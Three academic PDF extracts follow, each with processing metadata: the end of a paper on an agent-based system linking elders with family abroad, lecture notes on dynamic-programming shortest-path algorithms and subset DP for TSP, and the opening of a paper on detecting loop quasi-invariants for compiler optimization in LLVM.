story related to that card’s image as illustrated in Figure 7. This agent is visually represented by a relative’s photograph. When this agent perceives that the person being represented is connected, it invites him to joining to the game. Thus, the relative realizes the elder is thinking about him. If the relative decides to join the game, the virtual player agent will cede control to him, and the photograph of the relative will be emphasized to indicate the real relative is playing the game. **Real Player Agent:** If a relative decides to join a game of memory with the elder, the Real Player Agent is started. Then, it is connected to the game server, which is the Memory Game Agent. The Real Player Agent has an IM client through which the user can maintain contact with the elder while they are playing. Through a sample application, we describe next how these components interact to support emotional and social ties of elders and their family. ### 6.4. Sample application We revisit Scenario 1 to illustrate the functionality of the system architecture. Figure 8 illustrates how the system’s components interact to support this scenario: While Mario is at his school, he loads in the weblog a review he wrote for his father of the latest soccer game of the Mexican league. The Newspaper Agent is aware that a change was made to the weblog, and updates the family newspaper. Then, it notifies the family Display Agent that the newspaper is available. The Display agent sounds an alarm to advertise that the newspaper has news. Thus, while Mr. Valenzuela is eating his breakfast, he approaches the display and selects the Sports section. As Mr. Valenzuela realizes that his son would like to read some comments from some of the players published in yesterday’s newspaper, he scans the note. For this, he touches some buttons on the system to address the scanner system. Then, Mr. Valenzuela chooses to load the note. The order is interpreted by the Weblog Agent that posts the note. Finally, the Newspaper Agent becomes aware of the new change in the weblog, and then, modifies the newspaper. ![Figure 6. The Memory Game - Entertainment Section.](image) **Figure 6.** The Memory Game - Entertainment Section. ![Figure 7. The Virtual Player - Entertainment Section.](image) **Figure 7.** The Virtual Player - Entertainment Section. ### 7. Conclusion and future work We have presented the design of a system to help elders to incorporate them to the social networks that have become fragmented due to the distance between them and their families living abroad. We centered our design in three main aspects: 1) Provide an easy to use interface for elders. For this, the presentation of the shared information is presented in the format of a newspaper, which is a concept already known by any user. For facilitating the elders’ interaction with the family newspaper, we propose they access it through a Tablet-PC with a touch screen, in which there are several autonomous agents as personal assistants. 2) Make the system accessible for the elders’ relatives from any computer. The system uses web-based technology, such as weblogs which is a tool already used by many people to share personal information with others. 3) Designing our system in such a way facilitates its extension and evolution. For this, we used autonomous agents as the main design constructors of the system. In regards to this aspect, we are planning to extend the system’s functionality to provide “reminders” to users. For instance, we found from our study that elders’ family make phone calls more frequently at the beginning of their separation. However as times goes by, elders and their families might experience more infrequent interactions, their relationships get disrupted and this causes sadness to both parties. To remedy this, agents can be aware of this situation and decide when to send a “reminder” to one or more of the relatives so that the emotional ties remain among them. 8. References 1. CONAPO, There are in Mexico 7.9 millions of elders. 2004. 13. Çelikbas, Z., What is RSS and how can it serve libraries?, in Info To Go Navigating the Internet. 2004.
{"Source-Url": "http://www.researchgate.net/profile/Luis_Castro7/publication/221036010_A_Web-Based_System_to_Facilitate_Elders_Communication_with_Their_Families_Living_Abroad/links/09e41512e326b30090000000.pdf", "len_cl100k_base": 5895, "olmocr-version": "0.1.50", "pdf-total-pages": 8, "total-fallback-pages": 0, "total-input-tokens": 23250, "total-output-tokens": 6794, "length": "2e12", "weborganizer": {"__label__adult": 0.0013790130615234375, "__label__art_design": 0.00665283203125, "__label__crime_law": 0.0013017654418945312, "__label__education_jobs": 0.0243988037109375, "__label__entertainment": 0.00044345855712890625, "__label__fashion_beauty": 0.0007405281066894531, "__label__finance_business": 0.0011072158813476562, "__label__food_dining": 0.0017604827880859375, "__label__games": 0.0021533966064453125, "__label__hardware": 0.0063018798828125, "__label__health": 0.0123748779296875, "__label__history": 0.00171661376953125, "__label__home_hobbies": 0.001941680908203125, "__label__industrial": 0.0008015632629394531, "__label__literature": 0.0018720626831054688, "__label__politics": 0.0006742477416992188, "__label__religion": 0.002330780029296875, "__label__science_tech": 0.309814453125, "__label__social_life": 0.0175628662109375, "__label__software": 0.1480712890625, "__label__software_dev": 0.4541015625, "__label__sports_fitness": 0.0005459785461425781, "__label__transportation": 0.0012798309326171875, "__label__travel": 0.0007929801940917969}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 31195, 0.01689]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 31195, 0.37705]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 31195, 0.9562]], "google_gemma-3-12b-it_contains_pii": [[0, 4068, false], [4068, 8316, null], [8316, 13478, null], [13478, 17928, null], [17928, 22500, null], [22500, 24860, null], [24860, 28785, null], [28785, 31195, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4068, true], [4068, 8316, null], [8316, 13478, null], [13478, 17928, null], [17928, 22500, null], [22500, 24860, null], [24860, 28785, null], [28785, 31195, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 31195, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 31195, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 31195, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 31195, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 31195, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 31195, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 31195, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 31195, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 31195, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 31195, null]], "pdf_page_numbers": [[0, 4068, 1], [4068, 8316, 2], [8316, 13478, 3], [13478, 17928, 4], [17928, 22500, 5], [22500, 24860, 6], [24860, 28785, 7], [28785, 31195, 8]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 31195, 0.0]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
ff597fe533c313592734d7afbdc5ee017489e3cc
In this lecture we continue our discussion of dynamic programming, focusing on using it for a variety of path-finding problems in graphs. Topics in this lecture include: - The Bellman-Ford algorithm for single-source (or single-sink) shortest paths. - Matrix-product algorithms for all-pairs shortest paths. - Algorithms for all-pairs shortest paths, including Floyd-Warshall and Johnson. - Dynamic programming for the Travelling Salesperson Problem (TSP). 1 Introduction As a reminder of basic terminology: a graph is a set of nodes or vertices, with edges between some of the nodes. We will use $V$ to denote the set of vertices and $E$ to denote the set of edges. If there is an edge between two vertices, we call them neighbors. The degree of a vertex is the number of neighbors it has. Unless otherwise specified, we will not allow self-loops or multi-edges (multiple edges between the same pair of nodes). As is standard with discussing graphs, we will use $n = |V|$, and $m = |E|$, and we will let $V = \{1, \ldots, n\}$. The above describes an undirected graph. In a directed graph, each edge now has a direction (and as we said earlier, we will sometimes call the edges in a directed graph arcs). For each node, we can now talk about out-neighbors (and out-degree) and in-neighbors (and in-degree). In a directed graph you may have both an edge from $u$ to $v$ and an edge from $v$ to $u$. We will be especially interested here in weighted graphs where edges have weights (which we will also call costs or lengths). For an edge $(u, v)$ in our graph, let’s use $\text{len}(u, v)$ to denote its weight. The basic shortest-path problem is as follows: **Definition 1** Given a weighted, directed graph $G$, a start node $s$ and a destination node $t$, the s-t shortest path problem is to output the shortest path from $s$ to $t$. The single-source shortest path problem is to find shortest paths from $s$ to every node in $G$. The (algorithmically equivalent) single-sink shortest path problem is to find shortest paths from every node in $G$ to $t$. We will allow for negative-weight edges (we’ll later see some problems where this comes up when using shortest-path algorithms as a subroutine) but will assume no negative-weight cycles (else the shortest path can wrap around such a cycle infinitely often and has length negative infinity). As a shorthand in our drawings, if there is an edge of length $\ell$ from $u$ to $v$ and also an edge of length $\ell$ from $v$ to $u$, we will often just draw them together as a single undirected edge. So, all such edges must have positive weight. 2 Dijkstra’s Algorithm Let’s recall Dijkstra’s algorithm: given a directed graph $G = (V, E)$ with positive edge weights, the single-source shortest path problem can be solved using Dijkstra’s algorithm (you’ve seen this in 15-210) in time $O(m \log n)$. This uses a standard heap data-structure; using a fancier data structure called Fibonacci heaps, one can implement Dijkstra’s algorithm in $O(m + n \log n)$ time. This will be a benchmark to keep in mind. 3 The Bellman-Ford Algorithm We will now look at a Dynamic Programming algorithm called the Bellman-Ford Algorithm for the single-source shortest path problem. We will assume the graph is represented as a reversed adjacency list: an array $P$ of size $n$ where entry $v$ is the list of vertices from which there is an edge to $v$. (Given a node $v$, we can find all the other nodes $u$ such that there is an edge from $u$ to $v$ in time proportional to the number of such neighbors). How can we use Dynamic Programming to find the shortest path from $s$ to all other nodes? First of all, as usual for Dynamic Programming, let’s focus first on computing the lengths of the shortest paths. Later we’ll see how to store a little extra information to be able reconstruct the paths themselves. The idea for the algorithm is to keep track of the shortest path from $s$ to $v$ using paths consisting of $k$ or fewer edges. 1. For each node $v$, find the length of the shortest path from $s$ that uses at zero edges, or write down $\infty$ if there is no such path. This is easy: if $v = s$ this is 0, otherwise it’s $\infty$. 2. Now, suppose for all $v$ we have solved for length of the shortest path from $s$ that uses $k - 1$ or fewer edges. How can we use this to solve for the shortest path that uses $k$ or fewer edges? Answer: the shortest path from $s$ to $v$ (where $v \neq s$) that uses $k$ or fewer edges will first go to some neighbor $x$ of $v$ using $k - 1$ or fewer edges, then follow the edge $(x, v)$ to get to $v$. The first part of this path is already known for all $x$. So, we just need to take the min over all neighbors $x$ of $v$. To update the value for $s$, we do the same thing, except we also have to consider its distance using $k - 1$ edges, because the path might not have a predecessor. 3. How far do we need to go? Answer: at most $k = n - 1$ edges. So we can set this up as a recurrence. Let $D(v, k)$ be the minimum length path from $s$ to $v$ using $k$ or fewer edges. $$D(v, k) = \begin{cases} 0 & \text{if } k = 0 \text{ and } v = s \\ \infty & \text{if } k = 0 \text{ and } v \neq s \\ \min\{D(v, k - 1), \min_{x \in P(v)} D(x, k - 1) + \text{len}(x, v)\} & \text{otherwise} \end{cases}$$ The final answer we’re looking for is $D(v, n - 1)$. We could compute this by memoizing the above recurrence. Alternatively we could do it bottom-up by viewing with $D[v][k]$ as a two dimensional array of distances. The algorithm then becomes: **Bottom-Up Bellman-Ford:** - initialize: $D[v][0] \leftarrow$ if $v = s$ then 0 else $\infty$ - for $k = 1$ to $n - 1$: - for each $v \in V$: - $D[v][k] \leftarrow \min\{D[v][k - 1], \min_{u \in P(v)} D[u][k - 1] + \text{len}(u, v)\}$ - For each $v$, output $D[v][n - 1]$. --- 1The way the recurrence is written does not exactly mimic the description above. Here we consider the option $D(v, k - 1)$ for all nodes $v$ not just $s$. This removes extra cases in the recurrence and does not change the correctness. We already argued for correctness of the algorithm. What about running time? The min operation takes time proportional to the in-degree of \( v \). So, the inner for-loop takes time proportional to the sum of the in-degrees of all the nodes, which is \( O(m) \). Therefore, the total time is \( O(mn) \). So far we have only calculated the lengths of the shortest paths; how can we reconstruct the paths themselves? One easy way is (as usual for DP) to work backwards: if you’re at vertex \( v \) at distance \( d[v] \) from \( s \), move to the neighbor \( x \) such that \( d[v] = d[x] + \text{len}(x,v) \). This allows us to reconstruct the path in time \( O(m + n) \) which is just a low-order term in the overall running time. Alternatively, we could instrument the algorithm with an additional array of parent pointers. Whenever we compute a new shorter distance from \( s \) to \( v \) we update \( v \)'s parent to be the \( x \) which caused that to happen. At the end these pointers are a representation of the entire shortest path tree from \( s \) to all other vertices. The algorithm accommodates negative edges. And it can be used to detect if a graph has a negative cycle reachable from \( s \). If there is no such negative cycle, then the shortest path from \( s \) to \( v \) for all \( v \) uses at most \( n - 1 \) edges. (If it uses more than that it must use a vertex twice and thus involve a cycle.) Thus if we were to make one additional pass with \( k = n \), none of the distances would change. So if we make an additional pass and some of the distances change, this means that there IS a negative cycle reachable from \( s \). The cycle can be found via the use of the parent pointers mentioned above. ### 4 All-pairs Shortest Paths Say we want to compute the length of the shortest path between every pair of vertices. This is called the all-pairs shortest path problem. If we use Bellman-Ford for all \( n \) possible destinations \( t \), this would take time \( O(mn^2) \). We will now see three alternative Dynamic-Programming algorithms for this problem: the first uses the matrix representation of graphs and runs in time \( O(n^3 \log n) \); the second, called the Floyd-Warshall algorithm uses a different way of breaking into subproblems and runs in time \( O(n^3) \). The third allows us to adapt Dijkstra’s SSSP algorithm to the APSP problem, even on graphs with negative edge lengths. #### 4.1 All-pairs Shortest Paths via Matrix Products Given a weighted graph \( G \), define the matrix \( A = A(G) \) as follows: - \( A[i, i] = 0 \) for all \( i \). - If there is an edge from \( i \) to \( j \), then \( A[i, j] = \text{len}(i,j) \). - Otherwise (\( i \neq j \) and there is no edge from \( i \) to \( j \)), \( A[i, j] = \infty \). I.e., \( A[i, j] \) is the length of the shortest path from \( i \) to \( j \) using 1 or fewer edges\(^2\). Now, following the basic Dynamic Programming idea, can we use this to produce a new matrix \( B \) where \( B[i, j] \) is the length of the shortest path from \( i \) to \( j \) using 2 or fewer edges? **Answer:** yes. \( B[i, j] = \min_k (A[i, k] + A[k, j]) \). Think about why this is true! \(^2\)There are multiple ways to define an adjacency matrix for weighted graphs — e.g., what \( A[i, i] \) should be and what \( A[i, j] \) should be if there is no edge from \( i \) to \( j \). The right definition will typically depend on the problem you want to solve. I.e., what we want to do is compute a matrix product $B = A \times A$ except we change “$\times$” to “$+$” and we change “$+$” to “min” in the definition. In other words, instead of computing the sum of products, we compute the min of sums. What if we now want to get the shortest paths that use 4 or fewer edges? To do this, we just need to compute $C = B \times B$ (using our new definition of matrix product). I.e., to get from $i$ to $j$ using 4 or fewer edges, we need to go from $i$ to some intermediate node $k$ using 2 or fewer edges, and then from $k$ to $j$ using 2 or fewer edges. So, to solve for all-pairs shortest paths we just need to keep squaring $O(\log n)$ times. Each matrix multiplication takes time $O(n^3)$ so the overall running time is $O(n^3 \log n)$. ### 4.2 All-pairs shortest paths via Floyd-Warshall Here is an algorithm that shaves off the $O(\log n)$ and runs in time $O(n^3)$. The idea is that instead of increasing the number of edges in the path, we’ll increase the set of vertices we allow as intermediate nodes in the path. In other words, starting from the same base case (the shortest path that uses no intermediate nodes), we’ll then go on to considering the shortest path that’s allowed to use node 1 as an intermediate node, the shortest path that’s allowed to use {1, 2} as intermediate nodes, and so on. ```plaintext // After each iteration of the outside loop, A[i][j] = length of the // shortest i->j path that’s allowed to use vertices in the set 1..k for k = 1 to n do: for each i,j do: ``` I.e., you either go through node $k$ or you don’t. The total time for this algorithm is $O(n^3)$. What’s amazing here is how compact and simple the code is! ### 4.3 Adapting Dijkstra’s Algorithm for All-pairs If all the edge lengths in the graph are non-negative, then we can run Dijkstra’s algorithm $n$ times, once for each starting vertex. This gives all-pairs shortest paths, and the running time is $O(n(n + m) \log n)$. This is better than Floyd-Warshall on graphs that are sparse. In fact as long as the number of edges is $O(n^2/\log n)$ it equals or beats $O(n^3)$. On the other hand, it does not handle graphs with negative edge lengths. This can be remedied by a trick discovered by Don Johnson. The idea is to somehow adjust the lengths of all the edges so that (1) they are all non-negative and (2) the shortest paths are the same in the original and in the modified graph. We’re going to compute a real-valued potential on each vertex. The potential of vertex $v$ is denoted $\Phi_v$. If we have an edge $(u, v)$ in the graph of length $\ell$, then its length in the modified graph is $\ell' = \ell + (\Phi_u - \Phi_v)$. Consider a path $P$ of length $L$ from $u$ to $v$ in the original graph. When you sum the modified lengths of the edges on that path it’s easy to see that the potential values all telescope and you’re left with just the starting minus the ending potential. In other words if $L'$ is the length of the path in the modified graph, we have: $$L' = L + \Phi_u - \Phi_v.$$ This is true for any path from \( u \) to \( v \). The potential difference is a constant independent of the path. Thus, the shortest path from \( u \) to \( v \) in the original graph and in the modified graph are exactly the same. How do we find such a magic set of potentials? Here’s how. Create a new vertex called 0, and add an edge of length 0 from vertex 0 to every other vertex. Now find the shortest path from vertex 0 to every other vertex using the Bellman-Ford algorithm. (If there is a negative cycle, this algorithm will find it.) Define \( \Phi_v \) to be the length of the shortest path from vertex 0 to \( v \). Now consider an edge \((u, v)\) of length \( \ell \). We know that \[ \Phi_u + \ell \geq \Phi_v \] (If this were not true then there would be a shorter path than \( \Phi_v \) from vertex 0 to \( v \) by going through \( u \).) It follows that: \[ \ell + \Phi_u - \Phi_v \geq 0 \] This is precisely the definition of \( \ell' \). Which proves that the modified edge lengths are non-negative. The running time of the Bellman-Ford part is \( O(nm) \). And the running time of Dijkstra’s algorithm is \( O(n(n + m) \log n) \). Assuming the graph is connected and that \( m \geq n \) this simplifies to \( O(nm \log n) \). 5 TSP The NP-hard Traveling Salesperson Problem (TSP) asks to find the shortest route that visits all vertices in the graph. To be precise, the TSP is the shortest tour that visits all vertices and returns back to the start. Since the problem is NP-hard, we don’t expect that Dynamic Programming will give us a polynomial-time algorithm, but perhaps it can still help. Specifically, the naive algorithm for the TSP is just to run brute-force over all \( n! \) permutations of the \( n \) vertices and to compute the cost of each, choosing the shortest. (We can reduce this to \( (n-1)! \) as follows. First of all without loss of generality, we can assume some vertex \( x \) is the start vertex. This reduced the number of permutations to try to \( (n-1)! \). Secondly, as we generate the permutation, we can keep track of the cost of the permutation up to this point. So there’s no need to pay the \( O(n) \) cost for each permutation to add up the costs.) We’re going to use Dynamic Programming to reduce this to \( O(n^2 2^n) \). This is still brute force but it’s not as brutish as the naive algorithm. As usual, let’s first just worry about computing the cost of the optimal solution, and then we’ll later be able to add in some hooks to recover the path. Also, let’s work with the shortest-path metric where we’ve already computed all-pairs-shortest paths (using, say, Floyd-Warshall) so we can view our graph as a complete graph with weights between any two vertices representing the shortest path between them. This is convenient since it means a solution is really just a permutation. Finally, let’s call the start vertex \( x \). Now, here is one fact we can use. Suppose someone told you what the initial part of the solution should look like and we want to use this to figure out the rest. Then really all we need to know \[3\] Using Fibonacci heaps, Dijkstra’s algorithm runs in \( O(m + n \log n) \). This gives an all-pairs algorithm whose running time is \( O(nm + n^2 \log n) \). So even on dense graphs this is no worse asymptotically than Floyd-Warshall. \[4\] Note that under this definition, it doesn’t matter which vertex we select as the start. The Traveling Salesperson Path Problem is the same thing but does not require returning to the start. Both problems are NP-hard. about it for the purpose of completing it into a tour is the set of vertices visited in this initial segment and the last vertex \( t \) visited in the set. We don’t really need the whole ordering of the initial segment. This means there are only \( n2^n \) subproblems (one for every set of vertices and ending vertex \( t \) in the set). Furthermore, we can compute the optimal solution to a subproblem in time \( O(n) \) given solutions to smaller subproblems (just look at all possible vertices \( t' \) in the set we could have been at right before going to \( t \) and take the one that minimizes the cost so far (stored in our lookup table) plus the distance from \( t' \) to \( t \)). Let’s set this up as a recurrence. Let \( t \) be a vertex that is different from the start vertex \( x \). Let \( S \) be a set of vertices containing \( x \) and \( t \). Define \( C(S, t) \) as follows: \[ C(S, t) = \text{The minimum cost path starting from } x \text{ and ending at } t \text{ and hitting all vertices in } S \text{ along the way.} \] Here’s a recurrence for \( C(S, t) \): \[ C(S, t) = \begin{cases} \text{len}(x, t) & \text{if } S = \{x, t\} \\ \min_{t' \in S, t' \neq t, t' \neq x} C(S - t, t') + \text{len}(t', t) & \text{otherwise} \end{cases} \] The parameter space for \( C(S, t) \) is \( 2^{n-1} \) (the number of subsets \( S \) considered) times \( n \) (the number of choices for \( t \)). For each recursive call we do \( O(n) \) work inside the call, for a total of \( O(n2^2n) \) time. The last thing is we just need to recompute the paths, but this is easy to do from the computations stored in the same way as we did for shortest paths. This technique is sometimes called “Subset DP”. These ideas apply in many cases to reduce a factorial running to time to a regular exponential running time. A very nice way to implement these kinds of algorithms in practice is to represent the set \( S \) as an integer, where a 1 bit in position \( b \) means the presence of \( b \) in the set. This facilitates memoization, because the set is now just an integer that can quickly used to index an array or be looked up in a hash table. --- 5 For more, see [http://xkcd.com/399/](http://xkcd.com/399/)
{"Source-Url": "http://www.cs.cmu.edu/~15451/lectures/lec13-dp2.pdf", "len_cl100k_base": 4909, "olmocr-version": "0.1.53", "pdf-total-pages": 6, "total-fallback-pages": 0, "total-input-tokens": 21371, "total-output-tokens": 5365, "length": "2e12", "weborganizer": {"__label__adult": 0.0005402565002441406, "__label__art_design": 0.0004189014434814453, "__label__crime_law": 0.0006265640258789062, "__label__education_jobs": 0.0021038055419921875, "__label__entertainment": 0.00017321109771728516, "__label__fashion_beauty": 0.0002617835998535156, "__label__finance_business": 0.0003743171691894531, "__label__food_dining": 0.00070953369140625, "__label__games": 0.0017547607421875, "__label__hardware": 0.0019588470458984375, "__label__health": 0.0012969970703125, "__label__history": 0.0006809234619140625, "__label__home_hobbies": 0.0002963542938232422, "__label__industrial": 0.0007920265197753906, "__label__literature": 0.0004642009735107422, "__label__politics": 0.0003666877746582031, "__label__religion": 0.0007610321044921875, "__label__science_tech": 0.1854248046875, "__label__social_life": 0.0001678466796875, "__label__software": 0.00994110107421875, "__label__software_dev": 0.78662109375, "__label__sports_fitness": 0.0008897781372070312, "__label__transportation": 0.0027942657470703125, "__label__travel": 0.0006628036499023438}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 18427, 0.01157]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 18427, 0.60313]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 18427, 0.89562]], "google_gemma-3-12b-it_contains_pii": [[0, 3067, false], [3067, 6065, null], [6065, 9528, null], [9528, 12639, null], [12639, 16198, null], [16198, 18427, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3067, true], [3067, 6065, null], [6065, 9528, null], [9528, 12639, null], [12639, 16198, null], [16198, 18427, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 18427, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 18427, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 18427, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 18427, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 18427, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 18427, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 18427, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 18427, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 18427, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 18427, null]], "pdf_page_numbers": [[0, 3067, 1], [3067, 6065, 2], [6065, 9528, 3], [9528, 12639, 4], [12639, 16198, 5], [16198, 18427, 6]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 18427, 0.0]]}
olmocr_science_pdfs
2024-12-11
2024-12-11
650ccf00a004d8836d3beec442800fe433c9fc38
Loop quasi-invariant chunk motion by peeling with statement composition Moyen, Jean-Yves; Rubiano, Thomas; Seiller, Thomas Published in: Proceedings 8th Workshop on Developments in Implicit Computational Complexity and 5th Workshop on Foundational and Practical Aspects of Resource Analysis DOI: 10.4204/EPTCS.248.9 Publication date: 2017 Document Version Publisher's PDF, also known as Version of record Citation for published version (APA): Loop Quasi-Invariant Chunk Motion by peeling with statement composition Jean-Yves Moyen Department of Computer Science University of Copenhagen (DIKU) moyen@lipn.univ-paris13.fr Thomas Rubiano Université Paris 13 - LIPN Department of Computer Science University of Copenhagen (DIKU) rubiano@lipn.univ-paris13.fr Thomas Seiller Department of Computer Science University of Copenhagen (DIKU) seiller@di.ku.dk Several techniques for analysis and transformations are used in compilers. Among them, the peeling of loops for hoisting quasi-invariants can be used to optimize generated code, or simply ease developers’ lives. In this paper, we introduce a new concept of dependency analysis borrowed from the field of Implicit Computational Complexity (ICC), allowing to work with composed statements called “Chunks” to detect more quasi-invariants. Based on an optimization idea given on a WHILE language, we provide a transformation method - reusing ICC concepts and techniques [9, 10] - to compilers. This new analysis computes an invariance degree for each statement or chunks of statements by building a new kind of dependency graph, finds the “maximum” or “worst” dependency graph for loops, and recognizes if an entire block is Quasi-Invariant or not. This block could be an inner loop, and in that case the computational complexity of the overall program can be decreased. We already implemented a proof of concept on a toy C parser[1] analysing and transforming the AST representation. In this paper, we introduce the theory around this concept and present a prototype analysis pass implemented on LLVM. In a very near future, we will implement the corresponding transformation and provide benchmarks comparisons. 1 Introduction A command inside a loop is an invariant if its execution has no effect after the first iteration of the loop. Typically, an assignment $x:=0$ in a loop is invariant (provided $x$ is not modified elsewhere). Loop invariants can safely be moved out of loops (hoisted) in order to make the program faster. A command inside a loop is quasi-invariant if its execution has no effect after a finite number of iterations of the loop. Typically, if a loop contains the sequence $x:=y$, $y:=0$, then $y:=0$ is invariant. However, $x:=y$ is not invariant. The first time the loop is executed, $x$ will be assigned the old value of $y$, and only from the second time onward will $x$ be assigned the value 0. Hence, this command is quasi-invariant. It can still be hoisted out of the loop, but to do so requires to peel the loop first, that is execute its body once (by copying it before the loop). The number of times a loop must be executed before a quasi-invariant can be hoisted is called here the degree of the invariant. © J.Y. Moyen, T. Rubiano, T. Seiller This work is licensed under the Creative Commons Attribution License. G. Bonfante, G. Moser (Eds.): 8th Workshop on Developments in Implicit Computational CompleXity and 5th Workshop on Foundational and Practical Aspects of Resource Analysis (DICE-FOPARA 2017) An obvious way to detect quasi-invariants is to first detect invariants (that is, quasi-invariants of degree 1) and hoist them; and iterate the process to find quasi-invariant of degree 2, and so on. This is, however, not very efficient since it may require a large number of iterations to find some invariance degrees. We provide here an analysis able to directly detect the invariance degree of any statements in the loop. Moreover, our analysis is able to assign an invariance degree non only to individual statements but also to groups of statements (called chunks). That way it is possible, for example, to detect that a whole inner loop is invariant and hoist it, thus decreasing the asymptotic complexity of the program. Loop optimization techniques based on quasi-invariance are well-known in the compilers community. The transformation idea is to peel loops a finite number of time and hoist invariants until there are no more quasi-invariants. As far as we know, this technique is called “peeling” and it was introduced by Song et al. [13]. The present paper offers a new point of view on this work. From an optimization on a WHILE language by Lars Kristiansen [9], we provide a redefinition of peeling and another transformation method based on techniques developed in the field of Implicit Computational Complexity. Implicit Computational Complexity (ICC) studies computational complexity in terms of restrictions of languages and computational principles, providing results that do not depend on specific machine models. Based on static analysis, it helps predict and control resources consumed by programs, and can offer reusable and tunable ideas and techniques for compilers. ICC mainly focuses on syntactic [4, 3], type [6, 2] and Data Flow [11, 7, 8, 12] restrictions to provide bounds on programs’ complexity. The present work was mainly inspired by the way ICC community uses different concepts to perform Data Flow Analysis, e.g. “Size-change Graphs” [11] or “Resource Control Graphs”[12] which track data values’ behavior and use a matrix notation inspired by [1], or “mwp-polynomials” [8] to provide bounds on data size. For our analysis, we focus on dependencies between variables to detect invariance. Dependency graphs [10] can have different types of arcs representing different kind of dependencies. Here we will use a kind of Dependence Graph Abstraction [5] that can be used to find local and global quasi-invariants. Based on these techniques, we developed an analysis pass and we will implement the corresponding transformation in LLVM. We propose a tool which is notably able to give enough information to easily peel and hoist an inner loop, thus decreasing the complexity of a program from $n^2$ to $n$. ### 1.1 State of the art on Quasi-Invariant detection in loop Invariants are basically detected using algorithm [1]. A dependency graph around variables is needed to provide relations between statements. For quasi-invariance, we need to couple dependence and dominance informations. In [13], the authors define a variable dependency graph (VDG) and detect a loop quasi-invariant variable $x$ if, among all paths ending at $x$, no path contain a node included in a circular path. Then they deduce an invariant length which corresponds to the length of the longest path ending in $x$. In the present paper, this length is called invariance degree. ### 1.2 Contributions To the authors’ knowledge, this is the first application of ICC techniques on a mainstream compiler. One interest is that our tool potentially applies to programs written in any programming language managed by LLVM. Moreover, this work should be considered as a first step of a larger project that will make ICC techniques more accessible to programmers. On a more technical side, our tool aims at improving on currently implemented loop invariant detec- tion and optimization techniques. The main LLVM tool for this purpose, Loop Invariant Code Motion (LICM), does not detect quasi-invariant of degree more than 3 (and not all of those of degree 2). More importantly, LICM will not detect quasi-invariant blocks of code (what we call chunk), such as whole loops. Our tool, on the other hand, detects quasi-invariants of arbitrary degree and is able to deal with chunks. For instance the optimization shown in [Figure 9] is not performed by LLVM nor in GCC even at their maximum optimization level. 2 In theory In this section, we redefine our own types of relations between variables to build a new dependency graph and apply a composition inspired by the graph composition of Size-Change Termination [11]. 2.1 Relations and Data Flow Graph We work with a simple imperative WHILE-language (the grammar is shown in [Figure 1], with semantics similar to C. $$ \begin{align*} (\text{Variables}) & \quad X & \ ::= & \quad X_1 \mid X_2 \mid X_3 \mid \ldots \mid X_n \\ (\text{Expression}) & \quad exp & \ ::= & \quad X \mid \text{op}(\text{exp}, \ldots, \text{exp}) \\ (\text{Command}) & \quad com & \ ::= & \quad X=\text{exp} \mid \text{com;com} \mid \text{skip} \mid \\ & & & \text{while } \text{exp} \text{ do } \text{com} \text{ od} \mid \\ & & & \text{if } \text{exp} \text{ then } \text{com} \text{ fi} \mid \\ & & & \text{use}(X_1, \ldots, X_n) \end{align*} $$ Figure 1: Grammar A WHILE program is thus a sequence of statements, each statement being either an assignment, a conditional, a while loop, a function call or a skip. The use command represents any command which does not modify its variables but use them and should not be moved around carelessly (typically, a printf). Statements are abstracted into commands. A command can be a statement or a sequence of commands. We also call a sequence of commands a chunk. **Data:** List of Statements in the Loop **Result:** List of Loop-invariants LI Initialization: while search until there is no new invariant... do for each statement \( s \) do if each variable in \( s \) has no definition in the loop or has exactly one loop-invariant definition or is constant then Add \( s \) to LI; end end end **Algorithm 1:** Basic invariants detection We start by giving an informal but intuitive definition of the notion of Data Flow Graph (DFG). A DFG represents dependencies between variables as a bipartite graph as in Figure 2. Each different type of arrow represents different types of dependencies. Each variable is shown twice: the occurrence on the left represents the variable before the execution of the command while the occurrence on the right represents the variable after the execution. Dependencies are then represented by two types of arrows from variables on the left to variables on the right: plain arrows for direct dependence, dashed arrows for propagation. Reinitialisation of a variable z then corresponds to the absence 